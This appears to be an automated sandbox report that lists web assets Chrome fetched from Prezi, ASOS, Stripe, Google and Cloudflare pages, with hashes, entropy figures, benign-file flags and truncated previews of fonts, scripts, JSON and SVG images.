                                                                                                                                                                                              Preview:wOF2......9........(..93...N.......................\.....r.`....$..a.....(..Q...X.6.$..8..<.. ..7..s..v[....b.n...e...J...L..P(u....u.r.j.h......:..A....@Y.d............w2..J.>K....7h!@..cm.u.A.<.y.!DJJ1G.....*.P......Q.D.56.Z:....TK..4.._.y.J.....N.v....:$O?B(..&...b..A}1.z.E.v8.8..v...0..I<yo.x.....,......[....Si.+.^.w^:A.4H.jI...y.......F.O.cY.jo.%..^z...Mb.....!{......[.LJ. {....JV.q..0P..L......dW.....?........t..`..=.+...O.o_Y..iM[..........J.......O..J..!....X...[. ...N^8.....cE55.I..rf.,.E...a....}..VU..-..#.....7..Sa._Oo..[V...'...C...d._..X.V...T..2T..Q......."2T.a...g8...4.. .o...z)W.....<.{w.....FF=..H.?Ewt-..~r...q..@H..j...&D.J).\...At.}d.... ~...........%....-.5FMJ.|.`.5h....h.......e%b~.j....[#$.lj0.l...1.GH./.%*"Q.T.6.,.a bQ.&..P.#_A.|.....{......).I.J.th.*..f..4.k@..zcw.6..L..(..'i.a.*.r..3.)T...*.T ..(4......m. T.].t."..&..V...R.%.4.Nv..O.....Yj<.2.@`j-..."_.'UD..H.......|D..t.....-}..A..t.I#..e......eN6K.X!.B..} .um..2U;..;w.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):7076
                                                                                                                                                                                              Entropy (8bit):5.52488676121649
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                              SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                              SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                              SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fprezi.com
                                                                                                                                                                                              Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                              Entropy (8bit):4.942373347667344
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:3437AADDCDF6922D623E172C2D6F9278
                                                                                                                                                                                              SHA1:F69066CF20141AC93418102D3EEE7C0225B8A623
                                                                                                                                                                                              SHA-256:35DCC382EB69D00369D708708CDC545F3968B68FA5BBE3E728D11FEDD04F93BB
                                                                                                                                                                                              SHA-512:2DAE5C5C30C6A0E763D8128F2CE1D467EAD432E582AB4EBB68E23991DB08F57490ABC0EED805FD33FAB5503C1737D9D47D4CC1090AE15D7391593FBB295D66E7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                                                                                                                                              Preview:<!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):98703
                                                                                                                                                                                              Entropy (8bit):5.095094604090508
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:182BB923244599F28A43A98CA9452FFF
                                                                                                                                                                                              SHA1:BB932361F5395730B4B72A79E8118F0C25216C39
                                                                                                                                                                                              SHA-256:D188DEC4D0375B7B6E574EE23CAFED05E8585D41021B9175C582C09F05651952
                                                                                                                                                                                              SHA-512:BD5BB37788DFF27A6CFEB42EFE9763C4060C9236C996BCB4AB3B5A57758752EDF74246593A94E3B797C1DED48AB27C7E2AD54F17A57BFF14449D151DAED0EB64
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.asos.com/assets/optimizely/datafiles/ShK2dzd7JQhz8jETx1Fkb.json
                                                                                                                                                                                              Preview:{"accountId":"19065870423","projectId":"19065870423","revision":"8838","attributes":[{"id":"19445413143","key":"browseCountry"},{"id":"19471622747","key":"locationCountryCode"},{"id":"19572524180","key":"recognised"},{"id":"19584103928","key":"platform"},{"id":"19679101399","key":"loggedIn"},{"id":"19720880074","key":"geoCountry"},{"id":"19952365849","key":"browseStore"},{"id":"20194331169","key":"affiliateId"},{"id":"20201651533","key":"identityAppClient"},{"id":"20202436670","key":"firstTimeVisitor"},{"id":"20212466535","key":"numberOfVisits"},{"id":"20234946677","key":"existingCustomer"},{"id":"20339120648","key":"cypress"},{"id":"21055600153","key":"identityRequestOrigin"},{"id":"21097923050","key":"appProductListingPage"},{"id":"21133402853","key":"isInStock"},{"id":"21139602000","key":"appSavedLists"},{"id":"21156991878","key":"app"},{"id":"21158820156","key":"visitPageCount"},{"id":"21189160222","key":"notBouncedVisit"},{"id":"21191190134","key":"language"},{"id":"21233360138","
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):301
                                                                                                                                                                                              Entropy (8bit):4.793915198016821
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E30E988D636A681C718F34DC6D2BBAD4
                                                                                                                                                                                              SHA1:13598FB68452894478430E9D97C3E0B4D8EC658B
                                                                                                                                                                                              SHA-256:E7D6E1585632F83517F764608D16C6EFD89A2A554FA18D4F91876C8CEA439C99
                                                                                                                                                                                              SHA-512:C6B2DDFA38F2B002AD7BF0F2837C1165ECDF7DC83D021D79D8669E8E6D856FF7332673475DA59846A91F7E029438359EB670E889D5D510E9F2A24526627D708C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://prezi.com/api/v2/fonts/stylesheet/?fontFamily=DMSerifText
                                                                                                                                                                                              Preview:@font-face {. font-family: "DMSerifText";. src: url("/api/v1/fonts/DMSerifText-Regular-GF/");. font-weight: normal;. font-style: normal;.}.@font-face {. font-family: "DMSerifText";. src: url("/api/v1/fonts/DMSerifText-Italic-GF/");. font-weight: normal;. font-style: italic;.}.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                              Entropy (8bit):3.577819531114783
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:4C8A26E14EDABDD7D6BFBF1472AFC853
                                                                                                                                                                                              SHA1:F268C3DB54608F753ED9320CB2411B00A40C8D65
                                                                                                                                                                                              SHA-256:B9224CA870B658AB694ECED1FBB07A971FCE7D0C990E50046929E9968BAF435C
                                                                                                                                                                                              SHA-512:820B85A739953E8A71E89FEB45BBFB01E2D2F8977D30B0AB11BED28A7CA2B0365595AA7074A3A9780C8DE95E0C8DE839B5C390519F5238E8435F44736CDD497F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAk6IOvrFv-oIxIFDaWTNiQ=?alt=proto
                                                                                                                                                                                              Preview:CgkKBw2lkzYkGgA=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 27 x 14, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                              Entropy (8bit):4.068159130770306
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:AADD9F81EB367149BFBB9532A6380689
                                                                                                                                                                                              SHA1:B2EB747A0DE7CD473DEFC053D85A53BEE68C8C17
                                                                                                                                                                                              SHA-256:7F3EF295A00BD7D348B3E3A595193F599D1966B16A1B96303E779896DE5B8CE5
                                                                                                                                                                                              SHA-512:6EC0BC7C28B0B96CCA44DFEE411CAFE3387D625CE7F1D32FB51B373A639FCF7A147DF0B3B20EF23114D05E146DE7B46884F226B07CC9D5DC950422FE2B64F821
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8de66c443a6b4624/1730910154575/vTpttRjnDlqagCq
                                                                                                                                                                                              Preview:.PNG........IHDR.............Q..*....IDAT.....$.....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (13624)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13698
                                                                                                                                                                                              Entropy (8bit):5.697522364571399
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:F9E9660E67C43524C5D32FEFB17A1656
                                                                                                                                                                                              SHA1:B5188C897C0B0D4EA1321976207664CD6A20FCDC
                                                                                                                                                                                              SHA-256:C89CACD0C31BEFF5767916DCFB82E606A53BF9586B2F95F5112EBE0304DADEF0
                                                                                                                                                                                              SHA-512:52BF9A0AE230A02DE3B8161F3AA692CA68E54D74B64FB16645CE05EBC19B99D29E88089D30C5267E927305CCA5A1DF524AD7518CCBEC74BFA1A2F77BEA19959D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.b9d17db11b52ff8009cc.js
                                                                                                                                                                                              Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[542],{52984:(e,n,o)=>{o.d(n,{Z:()=>t});const t={container:"ojIeyOc",list:"aR_DfXn",listItem:"F28iPnp ZHWKoMf leavesden3"}},7593:(e,n,o)=>{o.d(n,{Z:()=>t});const t={burger:"btUA6FL",icon:"BKBoO9a TYb4J9A c_IO2I_",burger__hidden:"GsizLQo"}},43110:(e,n,o)=>{o.d(n,{Z:()=>t});const t={button:"qQoHatg sY3mB1c london3-button",button__isPrimary:"UNPPQ3g",button__isSecondary:"hgH_Y9G",button__isTertiary:"_5yfajiU",button__isGreen:"mZPCs_0",button__hasInvertedSize:"z1gXcCj",button__isFullWidth:"rN8Tw8V",content:"IoxIrTY",content__isHidden:"lAtN7Wf",content__truncateText:"ISgGBrx"}},33529:(e,n,o)=>{o.d(n,{Z:()=>t});const t={countryFlag:"Oqkee2R"}},89356:(e,n,o)=>{o.d(n,{Z:()=>t});const t={backdrop:"Y7dVLVI"}},6490:(e,n,o)=>{o.d(n,{Z:()=>t});const t={wrapper:"rcApLkp",container:"o1eR0Yj",container__notLoading:"nxpLsV7",container__withError:"hGhvjVU"}},90869:(e,n,o)=>{o.d(n,{Z:()=>t});const t={inheritDisplay:"d7H1qqN",progres
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (26411)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):26470
                                                                                                                                                                                              Entropy (8bit):5.16276785278148
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:77AC15A3412FAFAE305B89341B230CB9
                                                                                                                                                                                              SHA1:B4F5B04037037550E1AE0DFD0934F69D30363477
                                                                                                                                                                                              SHA-256:19AF2EEA404A881A23C39E7F5ADCD0EC43B9F84B96BAAA4862F6CB9444333861
                                                                                                                                                                                              SHA-512:0636CC6525771F9CCB6904D3C9E568EC7374FDE9BACC4DDA6107D0A944C569E61AE053CB0F75740816333F71CF47290E933636E427810D776E49A7F5A76756D4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/asos-ui/sdk/saved-items-sdk.iife.48b6fe50.js
                                                                                                                                                                                              Preview:this.window=this.window||{},this.window.asos=this.window.asos||{},this.window.asos.customer=this.window.asos.customer||{},this.window.asos.customer.savedItemsSdk=function(t,e){"use strict";function r(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}function n(t,e){return t(e={exports:{}},e.exports),e.exports}var o=r(n((function(t){t.exports=function(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}):t[e]=r,t},t.exports.default=t.exports,t.exports.__esModule=!0}))),i="6.0.0",a="".concat("asos",".").concat("customer",".").concat("savedItemsSdk"),c="me/lists/default",u=c+"/items",s=c+"/summary",f="shared/",l={SORT_ORDER_DESCENDING:"dsc",SORT_ORDER_ASCENDING:"asc"},p={SORTBY_DATE:"date",SORTBY_DISCOUNT:"discount",SORTBY_PRICE:"price",SORTBY_BRAND:"brand",SORTBY_STOCK:"stock",SORTBY_RECENTLY_DISCOUNTED:"recentlydiscounted"},d={EXPAND_VARIANTS:"variants"},h=n((function(t){t.exports=function(t){if(Array.i
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1120
                                                                                                                                                                                              Entropy (8bit):5.55518211480394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:22B734D58BE41F35CACB1D206AA1088D
                                                                                                                                                                                              SHA1:E09943F68AF1B60C3B868E6FFADB42B653D06293
                                                                                                                                                                                              SHA-256:58A112A455DAA8A0912990D4E30FEFB594C1F4B79FB386EEB7B64B9D18B0E8C0
                                                                                                                                                                                              SHA-512:A61E49382DF06AF514C56B0F6C10DA19F2B1958607D067F51A37F7360A426F24C73833AC8442A52B521CD578E02DF76746EE2E6DF18B726962AE60CB1FCFE9F5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="18px" height="18px" viewBox="0 0 18 18" style="enable-background:new 0 0 18 18;" xml:space="preserve">.<style type="text/css">...st0{fill:#152235;}.</style>.<title>linkedin</title>.<desc>Created with Sketch.</desc>.<g id="Page-2">..<g id="Payment-page-Copy-16" transform="translate(-874.000000, -718.000000)">...<g id="linkedin" transform="translate(874.000000, 718.000000)">....<g id="LinkedIn">.....<path id="Shape" class="st0" d="M4,2c0,1.1-0.7,2-2,2C0.8,4,0,3.1,0,2.1C0,1,0.8,0,2,0S4,0.9,4,2L4,2z M0,18h4V5H0V18L0,18z...... M13.6,5.2c-2.1,0-3.3,1.2-3.8,2H9.7L9.5,5.5H5.9C5.9,6.6,6,7.9,6,9.4V18h4v-7.1c0-0.4,0-0.7,0.1-1c0.3-0.7,0
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):3940
                                                                                                                                                                                              Entropy (8bit):3.9592048137955604
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A7DDDF47631368B9AC186C0A26A046E5
                                                                                                                                                                                              SHA1:2A706D92842D5ADB2CB78FA553E1F883E5166565
                                                                                                                                                                                              SHA-256:842FFCD81D0AAB8358DEAD11F9807F620675ACEF04C159C6A9994A0B0547DA73
                                                                                                                                                                                              SHA-512:60541E55B574E9BF18256CA891E00611E5AA461158D4EFF235A22A2DF0CF7B43042FBC53B8CF9BE1B9F30A26253616C686D12B636FD66B7DC30A70F34D999B6F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.prezicdn.net/assets-versioned/prezipage-versioned/5255-770009b/common/img/logo/prezi-logo-white.svg
                                                                                                                                                                                              Preview:<svg id="Layer_1" xmlns="http://www.w3.org/2000/svg" width="98.4" height="36" viewBox="0 0 98.4 36"><style>.st0{fill:#fff}</style><title>prezi_logo</title><path class="st0" d="M17.9 7.3c-2.8 0-5.6 1.1-7.5 3.1-2 2-3.2 4.7-3.1 7.5-.1 2.8 1.1 5.5 3.1 7.5s4.7 3.2 7.5 3.1c2.8 0 5.5-1.1 7.5-3.1s3.2-4.7 3.1-7.5c0-2.8-1.1-5.6-3.1-7.5-1.9-2-4.6-3.1-7.5-3.1zm6.8 17.5c-1.8 1.8-4.2 2.8-6.8 2.8-2.6.1-5-1-6.8-2.8C9.2 23 8.2 20.6 8.3 18c-.1-2.6 1-5 2.8-6.8 1.8-1.9 4.2-2.9 6.8-2.8 2.6 0 5 1 6.8 2.8 1.8 1.8 2.8 4.2 2.8 6.8.1 2.6-.9 5-2.8 6.8zM17.9 9.5c-2.3 0-4.5.9-6.1 2.5-1.6 1.6-2.5 3.8-2.5 6.1s.9 4.5 2.5 6c1.6 1.6 3.8 2.5 6.1 2.5s4.5-.9 6-2.5c1.6-1.6 2.5-3.8 2.5-6 0-2.3-.9-4.5-2.5-6.1-1.5-1.6-3.7-2.6-6-2.5zm7.5 8.9c0 2-.9 3.9-2.4 5.2-1.5 1.4-3.4 2.1-5.4 1.9-4.1-.2-7.3-3.6-7.1-7.8v-.1c.1-2 1-3.9 2.5-5.2 1.5-1.4 3.4-2.1 5.4-1.9 2 .1 3.8 1 5.1 2.5 1.3 1.5 2 3.4 1.9 5.4zm4.3-5.3C29 11.6 28.1 10.2 27 9c-1.2-1.2-2.5-2.1-4.1-2.7-1.6-.7-3.3-1-5-1-1.7 0-3.4.3-5 1-1.5.6-2.9 1.5-4 2.7-1.2 1.2-2.1 2.5-2.7 4.1-.7
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (65098)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):213725
                                                                                                                                                                                              Entropy (8bit):5.361679936162521
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:F1D54743DBCC9A03EB08F14D0DE65DA4
                                                                                                                                                                                              SHA1:16B96431016B503517462F0797901AD8DAC94481
                                                                                                                                                                                              SHA-256:4E973E1B8E6B798931086CF372B83E40C417E33C0922087DAD0EB2F89FA891AC
                                                                                                                                                                                              SHA-512:209CC5643F2EFEB7E0EDD8CF015FCFF122BC355FE89694650A0CE7761FA1B22284A26CE218FE6A5337E9DCA6F7704A7AE523B997413338FF98AE10FC54804736
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://s2.go-mpulse.net/boomerang/KEKMC-5QPEH-Y5FHE-8AH54-JDSN3
                                                                                                                                                                                              Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017-2022, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.766.0 c28975a504c1aa46de14fe358f4875ace2917401 */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1651
                                                                                                                                                                                              Entropy (8bit):4.134836278727537
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:6247637576BF7D9282AB8E5B3AEA7B0A
                                                                                                                                                                                              SHA1:BA01916A6FC2192610BAC7639F37828B2A3859EF
                                                                                                                                                                                              SHA-256:26315778F8A273A9F1D05C98A18B2F7F89327DAB9EB71111D39D8AF30127D8EF
                                                                                                                                                                                              SHA-512:CA04C095922B19E4BBC5B0BBFB3AB9CE6C857EEA0CBF8AA9338FAB73F6278DAAD7B096E03A9D8567498CD3627207A6E926B7FF41EE1C1548655193183AF470D2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 435.2 1000 129.6"><path fill="none" d="M812.6 472.1c-2.2-20.1-27.4-18.6-32.2-18.6h-10.1V495c4.3.2 7.6.2 11.9.2 5.1 0 33 .7 30.4-23.1zM631.4 452.9c-28.7 0-44.9 21.2-44.9 47.1 0 26.1 16.2 47.1 44.9 47.1s44.9-21.2 44.9-47.1c0-26.1-16.4-47.1-44.9-47.1zM305.1 454.2h-10.8v44.3H307c11.4 0 34.8-1.1 33.5-23.5-.8-22.9-30.4-20.8-35.4-20.8zM944.3 458.3L924.9 519l39.9-.2-20.3-60.5"/><path d="M493.4 487.3h-62.8v-48.2h-19v122.4h19v-58h62.8v58h18.8V439.1h-18.8M308.1 438.7c-6.9-.2-20.9-.2-33.3-.2v122.9H294v-46.6c4.8 0 14.7-.4 22.7-.6 11.2-.2 40.4-5.8 40.2-39.5.3-38-41.8-36-48.8-36zm-1 59.8h-12.7v-44.3h10.8c5 0 34.5-2.2 35.4 20.7 1.2 22.5-22.1 23.6-33.5 23.6zM130.9 438.5l.2 122.9h77.1v-16h-57.9v-41.7h41c0-3.5-.2-8.6 0-15.3h-41v-33.5h57.9c-.2-9.7 0-16.4 0-16.4h-77.3zM18.8 468.5c0-20.1 26.6-20.9 42.3-8 5.4-15.5 5.8-16.6 5.8-16.6C21.1 421.9.2 451 .2 469.6c0 44.5 63.1 35 54 66.3-3.2 11.4-23.5 17.9-46.9 3.7-1.7 4.8-4.5 10.6-7.3 16.4 30.9 16.2 71 8.4 72.3-25
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (3835)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):262665
                                                                                                                                                                                              Entropy (8bit):5.5601570682647745
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:F4848941E7E309800821D9CAC6F8989D
                                                                                                                                                                                              SHA1:6DFB2C7BC6EBC71B962F48A85272408479B8BC53
                                                                                                                                                                                              SHA-256:499239AD3F0F556977E2FC6C2AB85216ED6A0CA8A97FBE929DA6B0E38385A6C2
                                                                                                                                                                                              SHA-512:5F747DF26347E43658AF8970017716AEB41AE5C613DFCA137C7D960445B91AC12874F7A2A3937ED1E50D69AAA19F2A3CFF81A52967CAC4BCF97B0F13CF4B2448
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=AW-1001687149&l=dataLayer&cx=c
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":14,"vtp_instanceDestinationId":"AW-1001687149","tag_id":8},{"function":"__ogt_1p_data_v2","priority":4,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd_ads_first","priority":3,"vtp_instanceDestinationId":"AW-1001687149","tag_id":9},{"function":"__ccd_pre_auto_pii","priority":1,"vtp_instanceDestinationId":"AW-1001687149","tag_id":7},{"function":"__rep","vtp_containerId":"AW-1001687149","vtp_remoteConfig":["map","enhanced_conversions",["map","Nva9COSci4QBEO2Q0t0D",["map","enhanced_conversions_mode","off","enhanced_conversions_automatic_settings",["map"]],"KsneCLr
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):256068
                                                                                                                                                                                              Entropy (8bit):5.549948860468191
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A5527E3F7F0846A203A3F9F760941509
                                                                                                                                                                                              SHA1:8CCF803CB7BE76F27FE1B3C7FD6C2D274D2CA17D
                                                                                                                                                                                              SHA-256:50C616D7336A3A12337607370546E1A52B2EC531BDA85C72E77E9A5BCAC8A1FC
                                                                                                                                                                                              SHA-512:ACFB0B9D35A9F3AB813CCF2D924A94308C126363C25257FFB32ADEB52D913897535A3CB47AF78B94F6B2C977AD1569E605A9D022522BB9498B9120DFC19A4C05
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{d
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1024
                                                                                                                                                                                              Entropy (8bit):5.555714280948775
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:73605F769148DB36D71439F235DD2B8E
                                                                                                                                                                                              SHA1:34535388896117DAB0A48B1FD19118F8DAB21142
                                                                                                                                                                                              SHA-256:70ED38179144E26BC93DCB6FA40F1396CCDD02F6BC04AD4700210582574A75DC
                                                                                                                                                                                              SHA-512:F882FB739F80192CE90F03A658E2F403FDBFB926D27A9F8EFFC16FA0CF8B088F55CAC78993F569738B18E3E586906E587075DB00A0F082F2339DF3BA43B6C7C6
